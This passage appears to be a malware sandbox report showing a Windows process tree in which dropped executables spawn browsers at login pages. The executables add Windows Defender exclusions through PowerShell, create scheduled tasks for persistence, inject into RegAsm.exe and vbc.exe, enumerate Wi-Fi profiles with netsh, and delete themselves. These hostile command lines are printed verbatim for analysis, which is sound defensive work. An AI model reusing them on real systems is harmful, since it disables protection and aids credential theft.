                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1856,i,10020902443811372000,17934562889129690032,131072 /prefetch:2
                                                                                5⤵
                                                                                  PID:6244
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                                                                                4⤵
                                                                                  PID:2180
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                                                                                    5⤵
                                                                                    • Checks processor information in registry
                                                                                    PID:6076
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.0.1260300726\1898268030" -parentBuildID 20221007134813 -prefsHandle 1596 -prefMapHandle 1588 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63817e3d-f0eb-45bf-9d90-44bf78a9e9f3} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 1668 19c2e7d2e58 gpu
                                                                                      6⤵
                                                                                        PID:6424
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.1.1513122371\1554572405" -parentBuildID 20221007134813 -prefsHandle 2072 -prefMapHandle 2068 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0eb597ac-47ef-44eb-adba-1a92c79f3c2c} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 2084 19c2e2e3158 socket
                                                                                        6⤵
                                                                                          PID:6680
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.2.2058167981\1480967564" -childID 1 -isForBrowser -prefsHandle 2880 -prefMapHandle 2876 -prefsLen 21711 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b25d823a-1d71-49df-8b8e-1b18a8187b3c} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 1036 19c3343db58 tab
                                                                                          6⤵
                                                                                            PID:6028
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.3.630826386\1091932981" -childID 2 -isForBrowser -prefsHandle 3124 -prefMapHandle 1412 -prefsLen 21752 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8889d32e-7629-425a-8252-d569d15f5055} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 3136 19c336afe58 tab
                                                                                            6⤵
                                                                                              PID:2848
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.4.752028670\1030525021" -childID 3 -isForBrowser -prefsHandle 3692 -prefMapHandle 3680 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6430d4b5-fe44-46d6-9899-1e455d0be77e} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 3704 19c349e2058 tab
                                                                                              6⤵
                                                                                                PID:6180
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.5.925197154\1639814092" -childID 4 -isForBrowser -prefsHandle 3120 -prefMapHandle 3688 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff44c6ad-b688-469e-8063-ec17e52b8268} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 3260 19c34d83e58 tab
                                                                                                6⤵
                                                                                                  PID:6224
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.7.117402283\1665528553" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5524 -prefMapHandle 5520 -prefsLen 26424 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d2ed410-aa4a-4774-9476-ccc75bcd0484} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 5536 19c35c97b58 utility
                                                                                                  6⤵
                                                                                                    PID:2556
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.6.1549216769\1678105265" -parentBuildID 20221007134813 -prefsHandle 5376 -prefMapHandle 5380 -prefsLen 26424 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a92863e-30b5-4853-a2a8-0c8627eecd13} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 5400 19c35c86b58 rdd
                                                                                                    6⤵
                                                                                                      PID:7728
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6076.8.1746039659\954650045" -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5672 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2962b5b-cead-41e0-af05-5f22a73b3c93} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" 5688 19c36b2d358 tab
                                                                                                      6⤵
                                                                                                        PID:6480
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
                                                                                                    4⤵
                                                                                                      PID:6136
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
                                                                                                        5⤵
                                                                                                          PID:3124
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                                                                                                        4⤵
                                                                                                          PID:2488
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                                                                                                            5⤵
                                                                                                              PID:4812
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\382498393934ena-rr.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\382498393934ena-rr.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Windows directory
                                                                                                          PID:5208
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                            4⤵
                                                                                                              PID:5788
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                              4⤵
                                                                                                                PID:5728
                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                4⤵
                                                                                                                • DcRat
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:3812
                                                                                                              • C:\Windows\System\svchost.exe
                                                                                                                "C:\Windows\System\svchost.exe" formal
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:6140
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                  5⤵
                                                                                                                    PID:7772
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                    5⤵
                                                                                                                      PID:7848
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5924
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\autorun.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\autorun.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:5132
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                    4⤵
                                                                                                                      PID:6096
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      4⤵
                                                                                                                        PID:6032
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                        4⤵
                                                                                                                          PID:5332
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                          4⤵
                                                                                                                            PID:2500
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                              5⤵
                                                                                                                                PID:8060
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd007a9758,0x7ffd007a9768,0x7ffd007a9778
                                                                                                                                  6⤵
                                                                                                                                    PID:8100
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1764,i,6611413575288994552,6559135901858837851,131072 /prefetch:2
                                                                                                                                    6⤵
                                                                                                                                      PID:6312
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1764,i,6611413575288994552,6559135901858837851,131072 /prefetch:8
                                                                                                                                      6⤵
                                                                                                                                        PID:7064
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1524 --field-trial-handle=1764,i,6611413575288994552,6559135901858837851,131072 /prefetch:8
                                                                                                                                        6⤵
                                                                                                                                          PID:7332
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1764,i,6611413575288994552,6559135901858837851,131072 /prefetch:1
                                                                                                                                          6⤵
                                                                                                                                            PID:3504
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2944 --field-trial-handle=1764,i,6611413575288994552,6559135901858837851,131072 /prefetch:1
                                                                                                                                            6⤵
                                                                                                                                              PID:5240
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3108 --field-trial-handle=1764,i,6611413575288994552,6559135901858837851,131072 /prefetch:8
                                                                                                                                              6⤵
                                                                                                                                                PID:8652
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1760 --field-trial-handle=1764,i,6611413575288994552,6559135901858837851,131072 /prefetch:1
                                                                                                                                                6⤵
                                                                                                                                                  PID:8804
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:5876
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_NKwtUN.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_NKwtUN.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5864
                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
                                                                                                                                              4⤵
                                                                                                                                                PID:2280
                                                                                                                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                                                                                                                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:7924
                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:6916
                                                                                                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
                                                                                                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:876
                                                                                                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:6920
                                                                                                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
                                                                                                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5588
                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                                                                                                                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:8184
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\costa.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\costa.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2304
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:6976
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\rty27.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\rty27.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:6380
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1540
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4008
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6376
                                                                                                                                                                          • C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                            chcp 1251
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:7752
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                                                                                                                                              7⤵
                                                                                                                                                                              • DcRat
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:7764
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\alex.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2304
                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6148
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:6872
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:6468
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:8024
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:7352
                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                    "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:7900
                                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                                        chcp 65001
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:7804
                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                          netsh wlan show profiles
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:6540
                                                                                                                                                                                          • C:\Windows\system32\findstr.exe
                                                                                                                                                                                            findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:6824
                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:6924
                                                                                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                                                                                chcp 65001
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:6640
                                                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                  netsh wlan show networks mode=bssid
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:8816
                                                                                                                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                    findstr "SSID BSSID Signal"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:8840
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:8892
                                                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                                                        chcp 65001
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:8052
                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                          timeout /t 3
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                          PID:2648
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\Kcqqn.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\Kcqqn.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:7308
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:6272
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp99.tmp.bat""
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:7436
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout 3
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:7844
                                                                                                                                                                                                              • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
                                                                                                                                                                                                                "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:5968
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:8208
                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • DcRat
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:9112
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:8428
                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                    "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:4920
                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                        schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • DcRat
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:7460
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\uedfh12.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\uedfh12.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:6928
                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:9068
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:6740
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:8412
                                                                                                                                                                                                                            • C:\Windows\Temp\tel.exe
                                                                                                                                                                                                                              "C:\Windows\Temp\tel.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:6564
                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:8392
                                                                                                                                                                                                                                • C:\Windows\Temp\jjj.exe
                                                                                                                                                                                                                                  "C:\Windows\Temp\jjj.exe"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:5420
                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:7924
                                                                                                                                                                                                                                    • C:\Windows\Temp\fcc.exe
                                                                                                                                                                                                                                      "C:\Windows\Temp\fcc.exe"
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:5544
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:6852
